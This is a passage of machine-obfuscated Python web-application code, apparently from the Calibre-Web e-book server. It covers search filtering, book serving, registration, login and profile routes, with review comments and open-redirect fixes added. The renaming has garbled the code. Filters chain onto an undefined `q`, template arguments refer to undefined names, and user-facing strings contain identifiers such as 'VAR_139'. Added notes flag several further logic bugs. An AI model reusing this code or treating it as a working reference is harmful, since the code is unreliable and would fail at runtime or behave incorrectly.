    """Apply include (VAR_22) / exclude (VAR_23) language filters to query VAR_21.

    A user restricted to one language overrides any selection.
    NOTE(review): the exclusion branch filters `db.Books.series` with a
    Languages condition — looks like a copy/paste bug inherited from the
    original; verify against `db.Books.languages`.
    """
    if VAR_87.filter_language() != "all":
        VAR_21 = q.filter(db.Books.languages.any(db.Languages.lang_code == VAR_87.filter_language()))
    else:
        for language in VAR_22:
            VAR_21 = q.filter(db.Books.languages.any(db.Languages.id == language))
        for language in VAR_23:
            VAR_21 = q.filter(not_(db.Books.series.any(db.Languages.id == language)))
    return VAR_21
def FUNC_50(VAR_21, VAR_24, VAR_25):
    """Apply rating-range filters: VAR_24 = max stars, VAR_25 = min stars
    (Calibre stores rating = stars * 2).

    NOTE(review): the lower bound is doubled into `rating_low` but the filter
    then compares against the undoubled VAR_25 — likely a bug / renaming
    artifact; the >= comparison should use the doubled value.
    """
    if VAR_24:
        VAR_24 = int(VAR_24) * 2
        VAR_21 = q.filter(db.Books.ratings.any(db.Ratings.rating <= VAR_24))
    if VAR_25:
        rating_low = int(VAR_25) * 2
        VAR_21 = q.filter(db.Books.ratings.any(db.Ratings.rating >= VAR_25))
    return VAR_21
def FUNC_51(VAR_21, VAR_26):
    """Apply a read-status filter ("True"/"False" string VAR_26) to query VAR_21.

    Uses a Calibre custom column when configured, otherwise the app's own
    per-user ReadBook table. Missing rows count as unread via coalesce.
    """
    if VAR_26:
        if config.config_read_column:
            try:
                if VAR_26 == "True":
                    VAR_21 = q.join(db.cc_classes[config.config_read_column], isouter=True) \
                        .filter(db.cc_classes[config.config_read_column].value == True)
                else:
                    VAR_21 = q.join(db.cc_classes[config.config_read_column], isouter=True) \
                        .filter(coalesce(db.cc_classes[config.config_read_column].value, False) != True)
            except (KeyError, AttributeError):
                # Configured custom column missing: warn, return query unfiltered.
                VAR_3.error(u"Custom Column No.%d is not existing in calibre database", config.config_read_column)
                flash(_("Custom Column No.%(column)d is not existing in calibre database",
                        column=config.config_read_column),
                      category="error")
                return VAR_21
        else:
            if VAR_26 == "True":
                VAR_21 = q.join(ub.ReadBook, db.Books.id == ub.ReadBook.book_id, isouter=True) \
                    .filter(ub.ReadBook.user_id == int(VAR_87.id),
                            ub.ReadBook.read_status == ub.ReadBook.STATUS_FINISHED)
            else:
                VAR_21 = q.join(ub.ReadBook, db.Books.id == ub.ReadBook.book_id, isouter=True) \
                    .filter(ub.ReadBook.user_id == int(VAR_87.id),
                            coalesce(ub.ReadBook.read_status, 0) != ub.ReadBook.STATUS_FINISHED)
    return VAR_21
def FUNC_52(VAR_21, VAR_27, VAR_28):
    """Apply include (VAR_27) / exclude (VAR_28) file-format filters to query VAR_21."""
    for extension in VAR_27:
        VAR_21 = q.filter(db.Books.data.any(db.Data.format == extension))
    for extension in VAR_28:
        VAR_21 = q.filter(not_(db.Books.data.any(db.Data.format == extension)))
    return VAR_21
def FUNC_53(VAR_21, VAR_29, VAR_30):
    """Apply include (VAR_29) / exclude (VAR_30) tag-id filters to query VAR_21."""
    for tag in VAR_29:
        VAR_21 = q.filter(db.Books.tags.any(db.Tags.id == tag))
    for tag in VAR_30:
        VAR_21 = q.filter(not_(db.Books.tags.any(db.Tags.id == tag)))
    return VAR_21
def FUNC_54(VAR_21, VAR_31, VAR_32):
    """Apply include (VAR_31) / exclude (VAR_32) series-id filters to query VAR_21."""
    for serie in VAR_31:
        VAR_21 = q.filter(db.Books.series.any(db.Series.id == serie))
    for serie in VAR_32:
        VAR_21 = q.filter(not_(db.Books.series.any(db.Series.id == serie)))
    return VAR_21
def FUNC_55(VAR_21, VAR_33, VAR_34):
    """Apply include (VAR_33) / exclude (VAR_34) shelf filters to query VAR_21.

    The outer join keeps books on no shelf at all; excluded shelves are
    filtered with notin_, then inclusion narrows to the selected shelves.
    """
    VAR_21 = q.outerjoin(ub.BookShelf, db.Books.id == ub.BookShelf.book_id)\
        .filter(or_(ub.BookShelf.shelf == None, ub.BookShelf.shelf.notin_(VAR_34)))
    if len(VAR_33) > 0:
        VAR_21 = q.filter(ub.BookShelf.shelf.in_(VAR_33))
    return VAR_21
def FUNC_56(VAR_35,
            VAR_36,
            VAR_37,
            VAR_38,
            VAR_39,
            VAR_40,
            VAR_41,
            VAR_24,
            VAR_25,
            VAR_26,
            ):
    """Build the human-readable summary of an advanced search.

    Appends every active criterion (author/title/publisher, publication date
    range, tag/series/shelf in- and exclusions, languages, rating bounds, read
    status, file formats) to VAR_35 and joins them with " + ". Invalid dates
    are dropped. Returns (summary string, validated start date, end date).
    """
    VAR_35.extend((VAR_36.replace('|', ','), VAR_37, VAR_38))
    if VAR_39:
        try:
            VAR_35.extend([_(u"Published after ") +
                           format_date(datetime.strptime(VAR_39, "%Y-%m-%d"),
                                       format='medium', locale=get_locale())])
        except ValueError:
            VAR_39 = u""
    if VAR_40:
        try:
            VAR_35.extend([_(u"Published before ") +
                           format_date(datetime.strptime(VAR_40, "%Y-%m-%d"),
                                       format='medium', locale=get_locale())])
        except ValueError:
            # NOTE(review): resets VAR_39 (start date) instead of VAR_40 —
            # likely a bug inherited from the original; verify.
            VAR_39 = u""
    VAR_92 = {'tag': db.Tags, 'serie': db.Series, 'shelf': ub.Shelf}
    for key, db_element in VAR_92.items():
        VAR_112 = calibre_db.session.query(db_element).filter(db_element.id.in_(VAR_41['include_' + key])).all()
        VAR_35.extend(tag.name for tag in VAR_112)
        # NOTE(review): the exclude names are queried into `tag_names` but the
        # include list VAR_112 is extended again — excluded names never appear
        # in the summary; verify against upstream.
        tag_names = calibre_db.session.query(db_element).filter(db_element.id.in_(VAR_41['exclude_' + key])).all()
        VAR_35.extend(tag.name for tag in VAR_112)
    VAR_57 = calibre_db.session.query(db.Languages). \
        filter(db.Languages.id.in_(VAR_41['include_language'])).all()
    if VAR_57:
        language_names = calibre_db.speaking_language(VAR_57)
        VAR_35.extend(language.name for language in VAR_57)
    VAR_57 = calibre_db.session.query(db.Languages). \
        filter(db.Languages.id.in_(VAR_41['exclude_language'])).all()
    if VAR_57:
        language_names = calibre_db.speaking_language(VAR_57)
        VAR_35.extend(language.name for language in VAR_57)
    if VAR_24:
        VAR_35.extend([_(u"Rating <= %(rating)s", rating=VAR_24)])
    if VAR_25:
        VAR_35.extend([_(u"Rating >= %(rating)s", rating=VAR_25)])
    if VAR_26:
        VAR_35.extend([_(u"Read Status = %(status)s", status=VAR_26)])
    VAR_35.extend(ext for ext in VAR_41['include_extension'])
    VAR_35.extend(ext for ext in VAR_41['exclude_extension'])
    # Drop empty criteria before joining.
    VAR_35 = " + ".join(filter(None, VAR_35))
    return VAR_35, VAR_39, VAR_40
def FUNC_57(VAR_17, VAR_18=None, VAR_10=None, VAR_19=None):
    """Execute an advanced search described by form data VAR_17 and render it.

    Builds an SQLAlchemy query by chaining the per-criterion helper filters
    (tags, series, shelves, extensions, languages, ratings, read status,
    custom columns), stores the query JSON and the resulting book ids, then
    renders the paged result slice [VAR_18:VAR_18+VAR_19].
    """
    VAR_10 = VAR_10 or [db.Books.sort]
    VAR_65 = None
    VAR_16 = get_cc_columns(filter_config_custom_read=True)
    # Register a Python lower() so ilike works on non-ASCII in SQLite.
    calibre_db.session.connection().connection.connection.create_function("lower", 1, db.lcase)
    VAR_21 = calibre_db.session.query(db.Books).outerjoin(db.books_series_link, db.Books.id == db.books_series_link.c.book)\
        .outerjoin(db.Series)\
        .filter(calibre_db.common_filters(True))
    # Collect include_/exclude_ lists for every multi-select element type.
    VAR_41 = dict()
    VAR_92 = ['tag', 'serie', 'shelf', 'language', 'extension']
    for VAR_113 in VAR_92:
        VAR_41['include_' + VAR_113] = VAR_17.get('include_' + VAR_113)
        VAR_41['exclude_' + VAR_113] = VAR_17.get('exclude_' + VAR_113)
    VAR_36 = VAR_17.get("author_name")
    VAR_37 = VAR_17.get("book_title")
    VAR_38 = VAR_17.get("publisher")
    VAR_39 = VAR_17.get("publishstart")
    VAR_40 = VAR_17.get("publishend")
    VAR_25 = VAR_17.get("ratinghigh")
    VAR_24 = VAR_17.get("ratinglow")
    VAR_93 = VAR_17.get("comment")
    VAR_26 = VAR_17.get("read_status")
    if VAR_36:
        # Normalize "Last, First" input to Calibre's "Last| First" storage form.
        VAR_36 = VAR_36.strip().lower().replace(',', '|')
    if VAR_37:
        VAR_37 = VAR_37.strip().lower()
    if VAR_38:
        VAR_38 = VAR_38.strip().lower()
    VAR_35 = []
    VAR_94 = False  # becomes True when any custom-column criterion is active
    for c in VAR_16:
        if c.datatype == "datetime":
            VAR_131 = VAR_17.get('custom_column_' + str(c.id) + '_start')
            VAR_132 = VAR_17.get('custom_column_' + str(c.id) + '_end')
            if VAR_131:
                VAR_35.extend([u"{} >= {}".format(c.name,
                                                  format_date(datetime.strptime(VAR_131, "%Y-%m-%d"),
                                                              format='medium',
                                                              locale=get_locale())
                                                  )])
                VAR_94 = True
            if VAR_132:
                VAR_35.extend([u"{} <= {}".format(c.name,
                                                  format_date(datetime.strptime(VAR_132, "%Y-%m-%d").date(),
                                                              format='medium',
                                                              locale=get_locale())
                                                  )])
                VAR_94 = True
        elif VAR_17.get('custom_column_' + str(c.id)):
            VAR_35.extend([(u"{}: {}".format(c.name, VAR_17.get('custom_column_' + str(c.id))))])
            VAR_94 = True
    # Only build filters when at least one criterion is set.
    if any(VAR_41.values()) or VAR_36 or VAR_37 or VAR_38 or VAR_39 or VAR_40 or VAR_25 \
            or VAR_24 or VAR_93 or VAR_94 or VAR_26:
        VAR_35, VAR_39, VAR_40 = FUNC_56(VAR_35,
                                         VAR_36,
                                         VAR_37,
                                         VAR_38,
                                         VAR_39,
                                         VAR_40,
                                         VAR_41,
                                         VAR_24,
                                         VAR_25,
                                         VAR_26)
        # NOTE(review): body chains onto `q` rather than VAR_21 from here on —
        # renaming artifact; confirm both name the same query object.
        VAR_21 = q.filter()
        if VAR_36:
            VAR_21 = q.filter(db.Books.authors.any(func.lower(db.Authors.name).ilike("%" + VAR_36 + "%")))
        if VAR_37:
            VAR_21 = q.filter(func.lower(db.Books.title).ilike("%" + VAR_37 + "%"))
        if VAR_39:
            VAR_21 = q.filter(func.datetime(db.Books.pubdate) > func.datetime(VAR_39))
        if VAR_40:
            VAR_21 = q.filter(func.datetime(db.Books.pubdate) < func.datetime(VAR_40))
        VAR_21 = FUNC_51(VAR_21, VAR_26)
        if VAR_38:
            VAR_21 = q.filter(db.Books.publishers.any(func.lower(db.Publishers.name).ilike("%" + VAR_38 + "%")))
        VAR_21 = FUNC_53(VAR_21, VAR_41['include_tag'], VAR_41['exclude_tag'])
        VAR_21 = FUNC_54(VAR_21, VAR_41['include_serie'], VAR_41['exclude_serie'])
        VAR_21 = FUNC_55(VAR_21, VAR_41['include_shelf'], VAR_41['exclude_shelf'])
        VAR_21 = FUNC_52(VAR_21, VAR_41['include_extension'], VAR_41['exclude_extension'])
        VAR_21 = FUNC_49(VAR_21, VAR_41['include_language'], VAR_41['exclude_language'])
        VAR_21 = FUNC_50(VAR_21, VAR_24, VAR_25)
        if VAR_93:
            VAR_21 = q.filter(db.Books.comments.any(func.lower(db.Comments.text).ilike("%" + VAR_93 + "%")))
        try:
            VAR_21 = FUNC_48(VAR_16, VAR_17, VAR_21)
        except AttributeError as ex:
            VAR_3.debug_or_exception(ex)
            flash(_("Error on VAR_80 for custom columns, please restart Calibre-Web"), category="error")
    VAR_21 = q.order_by(*VAR_10).all()
    # Persist the query and matching ids for paging / shelf operations.
    VAR_91['query'] = json.dumps(VAR_17)
    ub.store_ids(VAR_21)
    VAR_77 = len(VAR_21)
    if VAR_18 != None and VAR_19 != None:
        VAR_18 = int(VAR_18)
        VAR_114 = VAR_18 + int(VAR_19)
        VAR_65 = Pagination((VAR_18 / (int(VAR_19)) + 1), VAR_19, VAR_77)
    else:
        VAR_18 = 0
        VAR_114 = VAR_77
    return render_title_template('search.html',
                                 adv_searchterm=VAR_35,
                                 VAR_65=pagination,
                                 VAR_63=VAR_21[VAR_18:VAR_114],
                                 VAR_77=result_count,
                                 VAR_149=_(u"Advanced Search"), VAR_9="advsearch")
@VAR_2.route("/advsearch", methods=['GET'])
@login_required_if_no_ano
def FUNC_58():
    """Render the advanced-search form using read-filtered custom columns."""
    return FUNC_29(get_cc_columns(filter_config_custom_read=True))
@VAR_2.route("/cover/<int:VAR_5>")
@login_required_if_no_ano
def FUNC_59(VAR_5):
    """Serve the cover image for book id VAR_5."""
    cover_response = get_book_cover(VAR_5)
    return cover_response
@VAR_2.route("/robots.txt")
def FUNC_60():
    """Serve the static robots.txt shipped with the application."""
    static_dir = constants.STATIC_DIR
    return send_from_directory(static_dir, "robots.txt")
@VAR_2.route("/show/<int:VAR_5>/<VAR_6>", defaults={'anyname': 'None'})
@VAR_2.route("/show/<int:VAR_5>/<VAR_6>/<VAR_42>")
@login_required_if_no_ano
@FUNC_2
def FUNC_61(VAR_5, VAR_6, VAR_42):
    """Serve book VAR_5 in format VAR_6 for in-browser viewing.

    Google-Drive-backed libraries stream the file from Drive; TXT files are
    transcoded to UTF-8 so the browser renders them correctly.
    """
    VAR_6 = VAR_6.split(".")[0]
    VAR_95 = calibre_db.get_book(VAR_5)
    VAR_8 = calibre_db.get_book_format(VAR_5, VAR_6.upper())
    if not VAR_8:
        return "File not in Database"
    VAR_3.info('Serving VAR_95: %s', VAR_8.name)
    if config.config_use_google_drive:
        try:
            VAR_133 = Headers()
            VAR_133["Content-Type"] = mimetypes.types_map.get('.' + VAR_6, "application/octet-stream")
            VAR_134 = getFileFromEbooksFolder(VAR_95.path, VAR_8.name + "." + VAR_6)
            return do_gdrive_download(VAR_134, VAR_133, (VAR_6.upper() == 'TXT'))
        except AttributeError as ex:
            VAR_3.debug_or_exception(ex)
            return "File Not Found"
    else:
        if VAR_6.upper() == 'TXT':
            try:
                # Fix: use a context manager so the descriptor is always
                # closed (the previous open(...).read() leaked the handle).
                with open(os.path.join(config.config_calibre_dir, VAR_95.path,
                                       VAR_8.name + "." + VAR_6), "rb") as txt_file:
                    VAR_145 = txt_file.read()
                VAR_135 = chardet.detect(VAR_145)
                return make_response(
                    VAR_145.decode(VAR_135['encoding'], 'surrogatepass').encode('utf-8', 'surrogatepass'))
            except FileNotFoundError:
                VAR_3.error("File Not Found")
                return "File Not Found"
        return send_from_directory(os.path.join(config.config_calibre_dir, VAR_95.path), VAR_8.name + "." + VAR_6)
@VAR_2.route("/download/<int:VAR_5>/<VAR_6>", defaults={'anyname': 'None'})
@VAR_2.route("/download/<int:VAR_5>/<VAR_6>/<VAR_42>")
@login_required_if_no_ano
@FUNC_1
def FUNC_62(VAR_5, VAR_6, VAR_42):
    """Send the download response for book VAR_5 in format VAR_6.

    Flags the request as coming from a Kobo device when the User-Agent
    header says so.
    """
    # Fix: default to "" so a request without a User-Agent header does not
    # raise TypeError ('"Kobo" in None').
    VAR_96 = "kobo" if "Kobo" in request.headers.get('User-Agent', "") else ""
    return get_download_link(VAR_5, VAR_6, VAR_96)
@VAR_2.route('/send/<int:VAR_5>/<VAR_6>/<int:VAR_43>')
@login_required
@FUNC_1
def FUNC_63(VAR_5, VAR_6, VAR_43):
    """Queue book VAR_5 (format VAR_6, conversion flag VAR_43) for e-mail
    delivery to the current user's Kindle address, then redirect back.
    """
    if not config.get_mail_server_configured():
        flash(_(u"Please configure the SMTP mail settings first..."), category="error")
    elif VAR_87.kindle_mail:
        VAR_135 = send_mail(VAR_5, VAR_6, VAR_43, VAR_87.kindle_mail, config.config_calibre_dir,
                            VAR_87.name)
        if VAR_135 is None:
            flash(_(u"Book successfully queued for sending to %(kindlemail)s", kindlemail=VAR_87.kindle_mail),
                  category="success")
            ub.update_download(VAR_5, int(VAR_87.id))
        else:
            flash(_(u"Oops! There was an VAR_139 sending this VAR_95: %(res)s", res=VAR_135), category="error")
    else:
        flash(_(u"Please update your FUNC_68 with a valid Send to Kindle E-mail Address."), category="error")
    if "HTTP_REFERER" in request.environ:
        # Security fix (CWE-601): only follow the Referer when it is relative
        # or points at this host; redirecting to an arbitrary Referer header
        # is an open-redirect vector.
        from urllib.parse import urlparse
        referer = request.environ["HTTP_REFERER"]
        referer_host = urlparse(referer).netloc
        if not referer_host or referer_host == request.host:
            return redirect(referer)
    return redirect(url_for('web.index'))
@VAR_2.route('/register', methods=['GET', 'POST'])
def FUNC_64():
    """Self-registration endpoint.

    GET renders the registration form; POST validates the submitted name and
    e-mail, creates the account with a random password, and mails it to the
    user. Registration requires config_public_reg and a configured SMTP
    server. NOTE(review): obfuscated names — VAR_87 appears to be the
    current user proxy and VAR_0 a feature-flag dict; verify against imports.
    """
    if not config.config_public_reg:
        abort(404)
    if VAR_87 is not None and VAR_87.is_authenticated:
        # Already logged in: nothing to register.
        return redirect(url_for('web.index'))
    if not config.get_mail_server_configured():
        flash(_(u"E-Mail server is not configured, please contact your administrator!"), category="error")
        return render_title_template('register.html', VAR_149=_("Register"), VAR_9="register")
    if request.method == "POST":
        VAR_55 = request.form.to_dict()
        # When registration is keyed on e-mail, the e-mail doubles as username.
        VAR_115 = VAR_55["email"].strip() if config.config_register_email else VAR_55.get('name')
        if not VAR_115 or not VAR_55.get("email"):
            flash(_(u"Please fill out all fields!"), category="error")
            return render_title_template('register.html', VAR_149=_("Register"), VAR_9="register")
        try:
            # Both checks raise on duplicates / invalid format.
            VAR_115 = check_username(VAR_115)
            VAR_136 = check_email(VAR_55["email"])
        except Exception as ex:
            flash(str(ex), category="error")
            return render_title_template('register.html', VAR_149=_("Register"), VAR_9="register")
        VAR_116 = ub.User()
        if check_valid_domain(VAR_136):
            VAR_116.name = VAR_115
            VAR_116.email = VAR_136
            # Random initial password; delivered by registration mail below.
            VAR_137 = generate_random_password()
            VAR_116.password = generate_password_hash(VAR_137)
            VAR_116.role = config.config_default_role
            VAR_116.sidebar_view = config.config_default_show
            try:
                ub.session.add(VAR_116)
                ub.session.commit()
                if VAR_0['oauth']:
                    register_user_with_oauth(VAR_116)
                send_registration_mail(VAR_55["email"].strip(), VAR_115, VAR_137)
            except Exception:
                # Any failure (DB or mail) rolls the new account back.
                ub.session.rollback()
                flash(_(u"An unknown VAR_139 occurred. Please try again later."), category="error")
                return render_title_template('register.html', VAR_149=_("Register"), VAR_9="register")
        else:
            flash(_(u"Your e-mail is not allowed to register"), category="error")
            VAR_3.warning('Registering failed for VAR_104 "%s" e-mail address: %s', VAR_115, VAR_55["email"])
            return render_title_template('register.html', VAR_149=_("Register"), VAR_9="register")
        flash(_(u"Confirmation e-mail was send to your e-mail account."), category="success")
        return redirect(url_for('web.login'))
    if VAR_0['oauth']:
        register_user_with_oauth()
    return render_title_template('register.html', config=config, VAR_149=_("Register"), VAR_9="register")
@VAR_2.route('/login', methods=['GET', 'POST'])
def FUNC_65():
    """Login endpoint: LDAP or local authentication plus password reset.

    Security: the 'next' query parameter is only honoured when it is a
    site-relative path, preventing open redirects (CWE-601). Also fixes a
    NameError: 'next_url' was only assigned inside one branch but always
    passed to the template.
    """
    if VAR_87 is not None and VAR_87.is_authenticated:
        return redirect(url_for('web.index'))
    if config.config_login_type == constants.LOGIN_LDAP and not services.ldap:
        VAR_3.error(u"Cannot activate LDAP authentication")
        flash(_(u"Cannot activate LDAP authentication"), category="error")
    if request.method == "POST":
        VAR_117 = request.form.to_dict()
        VAR_104 = ub.session.query(ub.User).filter(func.lower(ub.User.name) == VAR_117['username'].strip().lower()) \
            .first()
        if config.config_login_type == constants.LOGIN_LDAP and services.ldap and VAR_104 and VAR_117['password'] != "":
            VAR_138, VAR_139 = services.ldap.bind_user(VAR_117['username'], VAR_117['password'])
            if VAR_138:
                login_user(VAR_104, remember=bool(VAR_117.get('remember_me')))
                ub.store_user_session()
                VAR_3.debug(u"You are now logged in as: '%s'", VAR_104.name)
                flash(_(u"you are now logged in as: '%(VAR_115)s'", VAR_115=VAR_104.name),
                      category="success")
                return redirect_back(url_for("web.index"))
            elif VAR_138 is None and VAR_104 and check_password_hash(str(VAR_104.password), VAR_117['password']) \
                    and VAR_104.name != "Guest":
                # LDAP unreachable: fall back to the locally stored hash.
                login_user(VAR_104, remember=bool(VAR_117.get('remember_me')))
                ub.store_user_session()
                VAR_3.info("Local Fallback Login as: '%s'", VAR_104.name)
                flash(_(u"Fallback Login as: '%(VAR_115)s', LDAP Server not reachable, or VAR_104 not known",
                        VAR_115=VAR_104.name),
                      category="warning")
                return redirect_back(url_for("web.index"))
            elif VAR_138 is None:
                VAR_3.info(VAR_139)
                flash(_(u"Could not FUNC_65: %(message)s", message=VAR_139), category="error")
            else:
                VAR_140 = request.headers.get('X-Forwarded-For', request.remote_addr)
                VAR_3.warning('LDAP Login failed for VAR_104 "%s" IP-address: %s', VAR_117['username'], VAR_140)
                flash(_(u"Wrong Username or Password"), category="error")
        else:
            VAR_140 = request.headers.get('X-Forwarded-For', request.remote_addr)
            if 'forgot' in VAR_117 and VAR_117['forgot'] == 'forgot':
                if VAR_104 != None and VAR_104.name != "Guest":
                    VAR_147, VAR_64 = reset_password(VAR_104.id)
                    if VAR_147 == 1:
                        flash(_(u"New Password was send to your VAR_136 address"), category="info")
                        VAR_3.info('Password reset for VAR_104 "%s" IP-address: %s', VAR_117['username'], VAR_140)
                    else:
                        VAR_3.error(u"An unknown VAR_139 occurred. Please try again later")
                        flash(_(u"An unknown VAR_139 occurred. Please try again later."), category="error")
                else:
                    flash(_(u"Please enter valid username to reset password"), category="error")
                    VAR_3.warning('Username missing for VAR_137 reset IP-address: %s', VAR_140)
            else:
                if VAR_104 and check_password_hash(str(VAR_104.password), VAR_117['password']) and VAR_104.name != "Guest":
                    login_user(VAR_104, remember=bool(VAR_117.get('remember_me')))
                    ub.store_user_session()
                    VAR_3.debug(u"You are now logged in as: '%s'", VAR_104.name)
                    flash(_(u"You are now logged in as: '%(VAR_115)s'", VAR_115=VAR_104.name), category="success")
                    config.config_is_initial = False
                    return redirect_back(url_for("web.index"))
                else:
                    VAR_3.warning('Login failed for VAR_104 "%s" IP-address: %s', VAR_117['username'], VAR_140)
                    flash(_(u"Wrong Username or Password"), category="error")
    VAR_97 = request.args.get('next', default=url_for("web.index"), type=str)
    # Never bounce the user back to the logout endpoint, and only accept
    # site-relative targets ('/x' but not '//host'): anything else would be
    # an open redirect (CWE-601).
    if url_for("web.logout") == VAR_97 or not VAR_97.startswith('/') or VAR_97.startswith('//'):
        VAR_97 = url_for("web.index")
    return render_title_template('login.html',
                                 VAR_149=_(u"Login"),
                                 VAR_97=VAR_97,
                                 config=config,
                                 VAR_100=VAR_100,
                                 mail=config.get_mail_server_configured(), VAR_9="login")
@VAR_2.route('/logout')
@login_required
def FUNC_66():
    """Terminate the current session (and OAuth session) and show the login page."""
    if VAR_87 is not None and VAR_87.is_authenticated:
        ub.delete_user_session(VAR_87.id, VAR_91.get('_id', ""))
        logout_user()
        if VAR_0['oauth'] and config.config_login_type in (2, 3):
            logout_oauth_user()
    VAR_3.debug(u"User logged out")
    return redirect(url_for('web.login'))
def FUNC_67(VAR_44, VAR_45, VAR_46, VAR_47, VAR_48):
    """Apply a POSTed profile form to the current user (VAR_87).

    Args (obfuscated — presumably: VAR_44 kobo_support flag, VAR_45
    registered-oauth mapping, VAR_46 oauth status, VAR_47 translations,
    VAR_48 languages; TODO confirm against caller FUNC_68).

    Returns a rendered error page on validation failure, otherwise None
    after committing (the caller re-renders the page itself).
    """
    VAR_55 = request.form.to_dict()
    VAR_87.random_books = 0
    # Only users with the password role (or admins) may change the password.
    if VAR_87.role_passwd() or VAR_87.role_admin():
        if VAR_55.get("password"):
            VAR_87.password = generate_password_hash(VAR_55["password"])
    try:
        if VAR_55.get("kindle_mail", VAR_87.kindle_mail) != VAR_87.kindle_mail:
            VAR_87.kindle_mail = valid_email(VAR_55["kindle_mail"])
        if VAR_55.get("email", VAR_87.email) != VAR_87.email:
            VAR_87.email = check_email(VAR_55["email"])
        if VAR_87.role_admin():
            # Only admins may rename their own account.
            if VAR_55.get("name", VAR_87.name) != VAR_87.name:
                VAR_87.name = check_username(VAR_55["name"])
        VAR_87.random_books = 1 if VAR_55.get("show_random") == "on" else 0
        if VAR_55.get("default_language"):
            VAR_87.default_language = VAR_55["default_language"]
        if VAR_55.get("locale"):
            VAR_87.locale = VAR_55["locale"]
        VAR_87.kobo_only_shelves_sync = int(VAR_55.get("kobo_only_shelves_sync") == "on") or 0
    except Exception as ex:
        flash(str(ex), category="error")
        # NOTE(review): the keyword values translations/languages/kobo_support/
        # oauth_status appear undefined in this scope (the matching locals are
        # the parameters VAR_47/VAR_48/VAR_44/VAR_46) — likely an artifact;
        # verify, as this branch would raise NameError at runtime.
        return render_title_template("user_edit.html",
                                     VAR_116=VAR_87,
                                     VAR_47=translations,
                                     FUNC_68=1,
                                     VAR_48=languages,
                                     VAR_149=_(u"%(VAR_13)s's profile", VAR_13=VAR_87.name),
                                     VAR_9="me",
                                     VAR_44=kobo_support,
                                     registered_oauth=VAR_45,
                                     VAR_46=oauth_status)
    # Rebuild the sidebar bitmask from all checked "show_*" form fields;
    # the field name suffix (key[5:]) carries the flag value.
    VAR_98 = 0
    for key, VAR_64 in VAR_55.items():
        if key.startswith('show'):
            VAR_98 += int(key[5:])
    VAR_87.sidebar_view = VAR_98
    if VAR_55.get("Show_detail_random"):
        VAR_87.sidebar_view += constants.DETAIL_RANDOM
    try:
        ub.session.commit()
        flash(_(u"Profile updated"), category="success")
        VAR_3.debug(u"Profile updated")
    except IntegrityError:
        # Duplicate e-mail address.
        ub.session.rollback()
        flash(_(u"Found an existing account for this e-mail address"), category="error")
        VAR_3.debug(u"Found an existing account for this e-mail address")
    except OperationalError as e:
        ub.session.rollback()
        VAR_3.error("Database VAR_139: %s", e)
        flash(_(u"Database VAR_139: %(error)s.", VAR_139=e), category="error")
@VAR_2.route("/me", methods=["GET", "POST"])
@login_required
def FUNC_68():
    """Show and (on POST) update the current user's profile page."""
    VAR_48 = calibre_db.speaking_language()
    VAR_47 = babel.list_translations() + [LC('en')]
    VAR_44 = VAR_0['kobo'] and config.config_kobo_sync
    if VAR_0['oauth'] and config.config_login_type == 2:
        VAR_46 = get_oauth_status()
        VAR_45 = VAR_100
    else:
        VAR_46 = None
        VAR_45 = {}
    if request.method == "POST":
        FUNC_67(VAR_44, VAR_45, VAR_46, VAR_47, VAR_48)
    # Fix: pass the locals computed above; the previous keyword values
    # referenced undefined names (translations, languages, kobo_support,
    # oauth_status), which would raise NameError at render time.
    return render_title_template("user_edit.html",
                                 VAR_47=VAR_47,
                                 FUNC_68=1,
                                 VAR_48=VAR_48,
                                 VAR_116=VAR_87,
                                 VAR_44=VAR_44,
                                 VAR_149=_(u"%(VAR_13)s's profile", VAR_13=VAR_87.name),
                                 VAR_9="me",
                                 registered_oauth=VAR_45,
                                 VAR_46=VAR_46)
@VAR_2.route("/read/<int:VAR_5>/<VAR_6>")
@login_required_if_no_ano
@FUNC_2
def FUNC_69(VAR_5, VAR_6):
    """Open the in-browser reader for book VAR_5 in format VAR_6
    (epub/pdf/txt/djvu, audio formats, or comic archives)."""
    VAR_95 = calibre_db.get_filtered_book(VAR_5)
    if not VAR_95:
        flash(_(u"Oops! Selected VAR_95 VAR_149 is unavailable. File does not exist or is not accessible"), category="error")
        VAR_3.debug(u"Oops! Selected VAR_95 VAR_149 is unavailable. File does not exist or is not accessible")
        return redirect(url_for("web.index"))

    FUNC_4 = None
    if VAR_87.is_authenticated:
        # Fix: the bookmark query result was assigned to an unused local, so
        # templates always received a None bookmark; keep the result here.
        FUNC_4 = ub.session.query(ub.Bookmark).filter(and_(ub.Bookmark.user_id == int(VAR_87.id),
                                                           ub.Bookmark.book_id == VAR_5,
                                                           ub.Bookmark.format == VAR_6.upper())).first()
    if VAR_6.lower() == "epub":
        VAR_3.debug(u"Start epub reader for %d", VAR_5)
        return render_title_template('read.html', bookid=VAR_5, VAR_149=VAR_95.title, VAR_99=FUNC_4)
    elif VAR_6.lower() == "pdf":
        VAR_3.debug(u"Start pdf reader for %d", VAR_5)
        return render_title_template('readpdf.html', pdffile=VAR_5, VAR_149=VAR_95.title)
    elif VAR_6.lower() == "txt":
        VAR_3.debug(u"Start txt reader for %d", VAR_5)
        return render_title_template('readtxt.html', txtfile=VAR_5, VAR_149=VAR_95.title)
    elif VAR_6.lower() == "djvu":
        VAR_3.debug(u"Start djvu reader for %d", VAR_5)
        return render_title_template('readdjvu.html', djvufile=VAR_5, VAR_149=VAR_95.title)
    else:
        for fileExt in constants.EXTENSIONS_AUDIO:
            if VAR_6.lower() == fileExt:
                VAR_63 = calibre_db.get_filtered_book(VAR_5)
                VAR_3.debug(u"Start mp3 listening for %d", VAR_5)
                return render_title_template('listenmp3.html', mp3file=VAR_5, audioformat=VAR_6.lower(),
                                              entry=VAR_63, VAR_99=FUNC_4)
        for fileExt in ["cbr", "cbt", "cbz"]:
            if VAR_6.lower() == fileExt:
                VAR_148 = str(VAR_5)
                VAR_149 = VAR_95.title
                if len(VAR_95.series):
                    VAR_149 = VAR_149 + " - " + VAR_95.series[0].name
                    if VAR_95.series_index:
                        VAR_149 = VAR_149 + " #" + '{0:.2f}'.format(VAR_95.series_index).rstrip('0').rstrip('.')
                VAR_3.debug(u"Start comic reader for %d", VAR_5)
                # Fix: pass the local title (VAR_149); the bare name 'title'
                # was undefined and raised NameError.
                return render_title_template('readcbr.html', comicfile=VAR_148, VAR_149=VAR_149,
                                              extension=fileExt)
    VAR_3.debug(u"Oops! Selected VAR_95 VAR_149 is unavailable. File does not exist or is not accessible")
    flash(_(u"Oops! Selected VAR_95 VAR_149 is unavailable. File does not exist or is not accessible"), category="error")
    return redirect(url_for("web.index"))
@VAR_2.route("/VAR_95/<int:VAR_5>")
@login_required_if_no_ano
def FUNC_70(VAR_5):
